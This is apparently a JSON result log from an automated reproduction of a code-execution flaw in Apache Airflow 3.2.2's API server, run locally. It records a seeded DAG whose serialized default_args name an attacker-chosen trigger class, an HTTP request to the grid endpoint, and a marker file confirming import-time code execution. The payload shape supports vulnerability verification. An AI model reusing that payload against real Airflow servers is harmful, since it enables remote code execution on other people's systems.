{
  "airflow_version_expected": "3.2.2",
  "attempt": 2,
  "dag_id": "cve_2026_33264_probe_3_2_2_2",
  "port": 18102,
  "airflow_home": "/data/pruva/runs/e6d20256-b0e8-49c3-a908-a69cffcc1535/bundle/artifacts/airflow_api_3.2.2_2/airflow_home",
  "module_dir": "/data/pruva/runs/e6d20256-b0e8-49c3-a908-a69cffcc1535/bundle/artifacts/airflow_api_3.2.2_2/airflow_home/dags",
  "marker": "/data/pruva/runs/e6d20256-b0e8-49c3-a908-a69cffcc1535/bundle/artifacts/airflow_api_3.2.2_2/api_server_rce_marker.txt",
  "server_log": "/data/pruva/runs/e6d20256-b0e8-49c3-a908-a69cffcc1535/bundle/artifacts/airflow_api_3.2.2_2/airflow_api_server.log",
  "endpoint_url": "http://127.0.0.1:18102/ui/grid/structure/cve_2026_33264_probe_3_2_2_2?offset=0&limit=100",
  "service_started": true,
  "healthcheck_passed": true,
  "target_reached": true,
  "http_status": "200",
  "import_side_effect_observed": true,
  "exception_type": null,
  "exception_message": null,
  "seed_stdout": "2026-07-07T22:36:58.954296Z [info     ] setup plugin alembic.autogenerate.schemas [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:36:58.954481Z [info     ] setup plugin alembic.autogenerate.tables [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:36:58.954564Z [info     ] setup plugin alembic.autogenerate.types [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:36:58.954655Z [info     ] setup plugin alembic.autogenerate.constraints [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:36:58.954743Z [info     ] setup plugin alembic.autogenerate.defaults [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:36:58.954837Z [info     ] setup plugin alembic.autogenerate.comments [alembic.runtime.plugins] loc=plugins.py:37\n{\n  \"seeded_dag_id\": \"cve_2026_33264_probe_3_2_2_2\",\n  \"dag_version_id\": \"019f3eba-37ba-774b-8cc2-f763f4dbbfa1\",\n  \"serialized_default_args\": \"{'__type': 'base_trigger', '__var': ['evil_trigger_module.EvilTrigger', {'__type': 'dict', '__var': {'attacker': 'serialized_dag_author_controlled_class_path'}}]}\"\n}\n",
  "api_server_pid": 17205,
  "health_http_status": "200",
  "curl_stderr": "",
  "http_response_excerpt": "[{\"id\":\"t1\",\"label\":\"t1\"}]",
  "http_headers_excerpt": "HTTP/1.1 200 OK\ndate: Tue, 07 Jul 2026 22:37:02 GMT\nserver: uvicorn\ncontent-length: 26\ncontent-type: application/json\nvary: Accept-Encoding\n\n",
  "api_server_returncode": 0,
  "marker_content": "import-time code execution in Airflow API server; pid=17205\n",
  "server_log_tail": "ing  ] FileType is deprecated. Simply open files after parsing arguments. [py.warnings] category=PendingDeprecationWarning filename=/data/pruva/project-cache/03610ec6-e6fb-4086-9681-103dd9199da6/repo/airflow_product_venv/lib/python3.14/site-packages/airflow/cli/cli_config.py lineno=605\n2026-07-07T22:37:00.579816Z [warning  ] FileType is deprecated. Simply open files after parsing arguments. [py.warnings] category=PendingDeprecationWarning filename=/data/pruva/project-cache/03610ec6-e6fb-4086-9681-103dd9199da6/repo/airflow_product_venv/lib/python3.14/site-packages/airflow/cli/cli_config.py lineno=816\n2026-07-07T22:37:00.613040Z [info     ] setup plugin alembic.autogenerate.schemas [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:37:00.613172Z [info     ] setup plugin alembic.autogenerate.tables [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:37:00.613216Z [info     ] setup plugin alembic.autogenerate.types [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:37:00.613246Z [info     ] setup plugin alembic.autogenerate.constraints [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:37:00.613276Z [info     ] setup plugin alembic.autogenerate.defaults [alembic.runtime.plugins] loc=plugins.py:37\n2026-07-07T22:37:00.613302Z [info     ] setup plugin alembic.autogenerate.comments [alembic.runtime.plugins] loc=plugins.py:37\n  ____________       _____________\n ____    |__( )_________  __/__  /________      __\n____  /| |_  /__  ___/_  /_ __  /_  __ \\_ | /| / /\n___  ___ |  / _  /   _  __/ _  / / /_/ /_ |/ |/ /\n _/_/  |_/_/  /_/    /_/    /_/  \\____/____/|__/\nRunning the API server with uvicorn:\nApps: all\nWorkers: 1\nHost: 127.0.0.1:18102\nTimeout: 120\nLogfiles: -\n=================================================================\n2026-07-07T22:37:02.217109Z [info     ] Started server process [17205] [uvicorn.error] loc=server.py:91\n2026-07-07T22:37:02.217223Z [info     ] Waiting for application startup. [uvicorn.error] loc=on.py:48\n2026-07-07T22:37:02.217792Z [info     ] Application startup complete.  [uvicorn.error] loc=on.py:62\n2026-07-07T22:37:02.218792Z [info     ] Uvicorn running on http://127.0.0.1:18102 (Press CTRL+C to quit) [uvicorn.error] loc=server.py:222\n2026-07-07T22:37:02.980007Z [warning  ] The HMAC key is 24 bytes long, which is below the minimum recommended length of 64 bytes for SHA512. See RFC 7518 Section 3.2. [py.warnings] category=InsecureKeyLengthWarning filename=/data/pruva/project-cache/03610ec6-e6fb-4086-9681-103dd9199da6/repo/airflow_product_venv/lib/python3.14/site-packages/jwt/api_jwt.py lineno=147\n2026-07-07T22:37:03.265133Z [warning  ] The HMAC key is 24 bytes long, which is below the minimum recommended length of 64 bytes for SHA512. See RFC 7518 Section 3.2. [py.warnings] category=InsecureKeyLengthWarning filename=/data/pruva/project-cache/03610ec6-e6fb-4086-9681-103dd9199da6/repo/airflow_product_venv/lib/python3.14/site-packages/jwt/api_jwt.py lineno=147\n2026-07-07T22:37:03.266508Z [warning  ] The HMAC key is 24 bytes long, which is below the minimum recommended length of 64 bytes for SHA512. See RFC 7518 Section 3.2. [py.warnings] category=InsecureKeyLengthWarning filename=/data/pruva/project-cache/03610ec6-e6fb-4086-9681-103dd9199da6/repo/airflow_product_venv/lib/python3.14/site-packages/jwt/api_jwt.py lineno=368\n2026-07-07T22:37:03.276681Z [info     ] request finished               [http.access] client_addr=127.0.0.1:40198 duration_us=11868 loc=http_access_log.py:98 method=GET path=/ui/grid/structure/cve_2026_33264_probe_3_2_2_2 query='offset=0&limit=100' status_code=200\n2026-07-07T22:37:03.355782Z [info     ] Shutting down                  [uvicorn.error] loc=server.py:270\n2026-07-07T22:37:03.456402Z [info     ] Waiting for application shutdown. [uvicorn.error] loc=on.py:67\n2026-07-07T22:37:03.456765Z [info     ] Application shutdown complete. [uvicorn.error] loc=on.py:76\n2026-07-07T22:37:03.456822Z [info     ] Finished server process [17205] [uvicorn.error] loc=server.py:101\n"
}